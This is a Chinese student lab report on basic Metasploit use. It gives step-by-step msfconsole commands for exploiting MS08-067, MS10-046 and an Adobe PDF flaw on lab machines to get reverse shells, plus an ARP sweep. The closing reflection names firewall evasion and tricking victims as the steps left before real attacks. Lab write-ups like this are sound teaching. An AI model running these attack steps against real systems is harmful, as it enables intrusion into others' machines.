20155208徐子涵 Exp5 MSF基础应用

20155208徐子涵 Exp5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode.

• Exploit：Exploit 的英文意思就是利用，它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞，所以说exploit和漏洞就是紧密相关的。

• Payload：payload属于名词意思有:有效载荷，而在网络攻防这一领域，他也可以说成是有效攻击载荷，相当于是将shellcode进行执行。

• Encode：encode的意思就是编码，主要是将后门等程序进行处理从而实现免杀等效果。

实践开始

实践一

MS08-067远程溢出漏洞攻击

• 首先打开msfconsole界面，指令就是简单的msfconsole

• 然后进行检索，使用指令search ms08_067 来对漏洞可以运用的攻击模块进行查询：

• 然后对所查询的攻击模块进行观察，看我们要使用哪一种攻击模块，这次我们选择使用exploit/windows/smb/ms08_067_netapi
  
  使用show payload可以查看我们使用的有效攻击载荷：

• 然后我们对所选取的payload进行设置，指令为set payload generic/shell_reverse_tcp ,然后show options查看设置状态：

这里要注意，我们需要设置RHOST和LHOST，一个是靶机的IP地址，另一个是攻击机的IP地址，设置成功：

• 然后就是最紧张刺激的时刻，开始攻击exploit,好的，一次性成功，获取主机的shell，这下我们可以为所欲为了，那就看一下靶机系统信息，使用指令systeminfo:

• OK,成功完成。

实践二

对浏览器攻击：ms10_046漏洞攻击

• 开始的步骤总是那么的相似，打开平台，对攻击模块进行检索：

• 这次我们选择使用的是exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  
  查看show payload:

• 这里我们所选择的payload是windows/meterpreter/reverse_tcp
  
  并进行设置，先用show options查看所需要设置的参数：

• 与上一个实践不同的是：SRVHOST填的是本地监听主机的IP地址，LHOST也是监听的IP地址，所以这里SRVHOST和LHOST都应该填攻击机的IP地址：

• 设置成功后，我们打开xp系统的IE浏览器，打开链接：http://192.168.88.134:80/:
  
  

• 此时kali显示接入一个会话：

• 使用 sessions -i 2 选择会话2(因为第一次IP地址输错了，所以不是会话1，而是会话2)，成功获取了靶机的shell，利用 systeminfo 指令查看靶机的系统信息：

• OK,第二个实践大功告成。

实践三

对Adobe的漏洞攻击

• 真的不想再重复上面那句话了，可是又有什么办法呢，还是要先打开平台检索和adobe漏洞有关的攻击模块啊：

• 这次选择exploit/windows/fileformat/adobe_cooltype_sing,然后查看payload：

• 选择windows/meterpreter/reverse_tcp 来攻击，并使用show options查看所需要设置的参数：

• 这个好哎，只需要设置主机IP就可以，设置成功后直接开始输入exploit,发现产生了一个pdf文件：

• 找到这一文件（刚开始还没找到，后来发现这个文件被隐藏了，设置显示隐藏文件就可以看到了）:

• 然后将文件拷到靶机中，设置主机IP及端口，输入exploit开始攻击，另一方面，在靶机中打开pdf文件，发现成功获取靶机shell：

实践四

ARP攻击

msf > use auxiliary/scanner/discovery/arp_sweep
然后
set RHOSTS 192.168.108.0-192.168.108.255
然后 exploit进行攻击

• 这个时候我们发现我们找到了192.168.88.130这一IP地址，这个就是我们想要找的靶机：
  
  

• 可以发现NTP网络时间协议服务器，它是用来同步各个计算机的时间的协议用的

实践五

辅助模块的应用

• 首先使用 show auxiliary 查看可以运用的辅助模块：

• 这里我们选择ARP扫描，使用命令：use scanner/discovery/arp_sweep ，并使用show options查看参数：

• 发现只需要设置主机的IP就可以

• 使用exploit指令开始扫描，成功扫描到靶机的smb版本：
  
  

实验总结与体会

通过这次的实验，我们充分利用了msf这一平台，不过msf也仅仅只是一个品台，有很多攻击都不能通过其来实现，比如我们如果把靶机换成windows7或者以上版本的系统时，我们就很难攻击成功，所以如果我们还想在这一方面更进一步的话，我们就要多研究多琢磨，看看还有什么好的平台或者软件、漏洞才会更接近攻击的实现。

离实战还缺些什么技术或步骤？

我觉得距离实战还有不少的距离，我们要做到攻击就要绕过防火墙，而这次的实验整体都是关闭了防火墙来做的，还有就是怎么才能做到让靶机顺其自然的打开建立连接的文件，这都是值得思考的而问题。